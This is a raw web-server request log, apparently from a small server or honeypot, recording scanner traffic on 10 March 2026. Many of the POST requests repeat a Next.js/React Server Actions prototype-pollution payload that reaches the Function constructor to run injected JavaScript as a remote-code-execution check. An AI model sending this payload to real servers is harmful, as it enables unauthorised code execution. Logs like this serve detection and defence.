User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:34366
Path: /api
URL: /api
Method: POST
[2026-03-10 17:22:42] === HTTP Request ===
===================
------WebKitFormBoundaryx1239242229727--
------WebKitFormBoundaryx1239242229727
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1239242229727
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 173577+true+7139438;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1239242229727
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_1239242229727
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1239242229727
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:34354
Path: /_next
URL: /_next
Method: POST
[2026-03-10 17:22:42] === HTTP Request ===
[2026-03-10 17:22:42] Main page accessed - IP: 195.3.221.86:34348
===================
------WebKitFormBoundaryx408537145373--
------WebKitFormBoundaryx408537145373
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx408537145373
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 197518+true+2068354;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx408537145373
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx408537145373
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_408537145373
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:34348
Path: /
URL: /
Method: POST
[2026-03-10 17:22:42] === HTTP Request ===
[2026-03-10 17:22:42] Main page accessed - IP: 195.3.221.86:34346
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:34346
Path: /
URL: /
Method: GET
[2026-03-10 17:22:42] === HTTP Request ===
===================
------WebKitFormBoundaryx1653928683991--
------WebKitFormBoundaryx1653928683991
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1653928683991
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 297385+true+5561574;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1653928683991
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Next-Action: x
X-Nextjs-Request-Id: poop1234
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1653928683991
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1653928683991
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:43348
Path: /api/route
URL: /api/route
Method: POST
[2026-03-10 16:28:39] === HTTP Request ===
===================
------WebKitFormBoundaryx2198738068717--
------WebKitFormBoundaryx2198738068717
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2198738068717
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 331302+true+6636658;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2198738068717
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Content-Length: 522
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_2198738068717
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2198738068717
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:43244
Path: /app
URL: /app
Method: POST
[2026-03-10 16:28:39] === HTTP Request ===
===================
------WebKitFormBoundaryx121024107001--
------WebKitFormBoundaryx121024107001
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx121024107001
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 230940+true+524050;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx121024107001
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx121024107001
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_121024107001
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:43222
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-10 16:28:38] === HTTP Request ===
===================
------WebKitFormBoundaryx1472373763041--
------WebKitFormBoundaryx1472373763041
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1472373763041
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 196459+true+7494560;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1472373763041
Content-Length: 522
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1472373763041
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_1472373763041
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:43156
Path: /api
URL: /api
Method: POST
[2026-03-10 16:28:37] === HTTP Request ===
===================
------WebKitFormBoundaryx53179061563--
------WebKitFormBoundaryx53179061563
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx53179061563
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 273306+true+194577;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx53179061563
Content-Length: 513
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_53179061563
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx53179061563
X-Nextjs-Request-Id: poop1234
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:43122
Path: /_next
URL: /_next
Method: POST
[2026-03-10 16:28:36] === HTTP Request ===
[2026-03-10 16:28:35] Main page accessed - IP: 193.32.162.28:43114
===================
------WebKitFormBoundaryx818079836011--
------WebKitFormBoundaryx818079836011
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx818079836011
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 122890+true+6657009;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx818079836011
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx818079836011
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_818079836011
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:43114
Path: /
URL: /
Method: POST
[2026-03-10 16:28:35] === HTTP Request ===
[2026-03-10 16:08:15] Main page accessed - IP: 167.71.223.42:58238
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.71.223.42:58238
Path: /
URL: /
Method: GET
[2026-03-10 16:08:15] === HTTP Request ===
[2026-03-10 15:41:22] Main page accessed - IP: 152.42.204.253:60922
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.42.204.253:60922
Path: /
URL: /
Method: GET
[2026-03-10 15:41:22] === HTTP Request ===
[2026-03-10 15:30:52] Main page accessed - IP: 165.245.187.143:42360
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.245.187.143:42360
Path: /
URL: /
Method: GET
[2026-03-10 15:30:52] === HTTP Request ===
===================
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:58198
Path: /jars
URL: /jars
Method: GET
[2026-03-10 14:34:10] === HTTP Request ===
[2026-03-10 13:56:55] Main page accessed - IP: 138.197.16.14:50898
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/70.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 138.197.16.14:50898
Path: /
URL: /
Method: GET
[2026-03-10 13:56:55] === HTTP Request ===
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.227.10.52:57924
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-10 12:48:34] === HTTP Request ===
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.227.10.52:57936
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-10 12:48:34] === HTTP Request ===
[2026-03-10 12:48:33] Main page accessed - IP: 64.227.10.52:57914
===================
Accept: */*
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.227.10.52:57914
Path: /
URL: /
Method: GET
[2026-03-10 12:48:33] === HTTP Request ===
[2026-03-10 12:46:29] Main page accessed - IP: 64.227.18.98:33096
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.227.18.98:33096
Path: /
URL: /
Method: GET
[2026-03-10 12:46:29] === HTTP Request ===
[2026-03-10 12:46:06] Main page accessed - IP: 172.30.0.12:44210
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 54.74.53.198
Via: 1.0 Caddy
User-Agent: Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44210
Path: /
URL: /
Method: GET
[2026-03-10 12:46:06] === HTTP Request ===
===================
------WebKitFormBoundaryx745493557186--
------WebKitFormBoundaryx745493557186
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx745493557186
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 177879+true+4191015;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx745493557186
X-Nextjs-Html-Request-Id: ilovepoop_745493557186
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx745493557186
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:43746
Path: /api/route
URL: /api/route
Method: POST
[2026-03-10 12:14:06] === HTTP Request ===
===================
------WebKitFormBoundaryx996947481475--
------WebKitFormBoundaryx996947481475
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx996947481475
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 243131+true+4100454;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx996947481475
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_996947481475
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx996947481475
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:43742
Path: /app
URL: /app
Method: POST
[2026-03-10 12:14:06] === HTTP Request ===
===================
------WebKitFormBoundaryx733661286486--
------WebKitFormBoundaryx733661286486
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx733661286486
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 139765+true+5249249;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx733661286486
Next-Action: x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_733661286486
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx733661286486
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:43728
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-10 12:14:06] === HTTP Request ===
===================
------WebKitFormBoundaryx601609369825--
------WebKitFormBoundaryx601609369825
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx601609369825
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 206496+true+2913419;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx601609369825
X-Nextjs-Html-Request-Id: ilovepoop_601609369825
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx601609369825
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 518
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:43714
Path: /api
URL: /api
Method: POST
[2026-03-10 12:14:06] === HTTP Request ===
===================
------WebKitFormBoundaryx1974158979805--
------WebKitFormBoundaryx1974158979805
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1974158979805
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 312444+true+6318441;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1974158979805
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1974158979805
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1974158979805
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:42616
Path: /_next
URL: /_next
Method: POST
[2026-03-10 12:14:06] === HTTP Request ===
[2026-03-10 12:14:04] Main page accessed - IP: 195.3.221.86:42612
===================
------WebKitFormBoundaryx980691940399--
------WebKitFormBoundaryx980691940399
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx980691940399
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 164449+true+5963502;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx980691940399
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_980691940399
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx980691940399
Next-Action: x
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:42612
Path: /
URL: /
Method: POST
[2026-03-10 12:14:04] === HTTP Request ===
[2026-03-10 12:14:03] Main page accessed - IP: 195.3.221.86:42604
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:42604
Path: /
URL: /
Method: GET
[2026-03-10 12:14:03] === HTTP Request ===
[2026-03-10 12:10:35] Main page accessed - IP: 93.123.109.35:59196
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 93.123.109.35:59196
Path: /
URL: /
Method: GET
[2026-03-10 12:10:35] === HTTP Request ===
[2026-03-10 12:05:34] Main page accessed - IP: 152.42.218.175:50324
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.42.218.175:50324
Path: /
URL: /
Method: GET
[2026-03-10 12:05:34] === HTTP Request ===
[2026-03-10 11:22:10] Main page accessed - IP: 68.183.185.175:55666
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 68.183.185.175:55666
Path: /
URL: /
Method: GET
[2026-03-10 11:22:10] === HTTP Request ===
[2026-03-10 11:05:00] Main page accessed - IP: 45.91.64.7:60021
===================
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 45.91.64.7:60021
Path: /
URL: /
Method: GET
[2026-03-10 11:05:00] === HTTP Request ===
[2026-03-10 10:46:27] Main page accessed - IP: 205.210.31.111:56781
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 205.210.31.111:56781
Path: /
URL: /
Method: GET
[2026-03-10 10:46:27] === HTTP Request ===
[2026-03-10 10:37:02] Main page accessed - IP: 35.233.78.239:58564
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.233.78.239:58564
Path: /
URL: /
Method: GET
[2026-03-10 10:37:02] === HTTP Request ===
[2026-03-10 10:05:36] Main page accessed - IP: 178.128.30.185:33494
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 178.128.30.185:33494
Path: /
URL: /
Method: GET
[2026-03-10 10:05:36] === HTTP Request ===
[2026-03-10 09:03:59] Main page accessed - IP: 172.30.0.12:57304
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57304
Path: /
URL: /
Method: GET
[2026-03-10 09:03:59] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:56814
Path: /jars
URL: /jars
Method: GET
[2026-03-10 07:09:31] === HTTP Request ===
[2026-03-10 07:08:45] Login page accessed - IP: 172.30.0.12:39434
===================
Sec-Fetch-Dest: document
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-User: ?1
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
Referer: https://admin.vulnberries.ru/login
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Priority: u=0, i
X-Forwarded-Proto: https
X-Forwarded-For: 178.120.58.120
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39434
Path: /login
URL: /login
Method: GET
[2026-03-10 07:08:45] === HTTP Request ===
[2026-03-10 07:08:44] Login page accessed - IP: 172.30.0.12:39434
===================
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Priority: u=0, i
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 178.120.58.120
Sec-Fetch-User: ?1
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Mode: navigate
Referer: https://admin.vulnberries.ru/login
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39434
Path: /login
URL: /login
Method: GET
[2026-03-10 07:08:44] === HTTP Request ===
[2026-03-10 07:08:44] Login page accessed - IP: 172.30.0.12:39434
===================
Via: 2.0 Caddy
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "macOS"
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Priority: u=0, i
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 178.120.58.120
Sec-Fetch-User: ?1
Referer: https://admin.vulnberries.ru/login
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39434
Path: /login
URL: /login
Method: GET
[2026-03-10 07:08:44] === HTTP Request ===
[2026-03-10 07:08:41] Login page accessed - IP: 172.30.0.12:39434
===================
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "macOS"
X-Forwarded-For: 178.120.58.120
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Referer: https://admin.vulnberries.ru/login
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Priority: u=0, i
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39434
Path: /login
URL: /login
Method: GET
[2026-03-10 07:08:41] === HTTP Request ===
[2026-03-10 07:08:39] Login page accessed - IP: 172.30.0.12:39434
===================
X-Forwarded-Proto: https
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Site: same-origin
X-Forwarded-For: 178.120.58.120
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
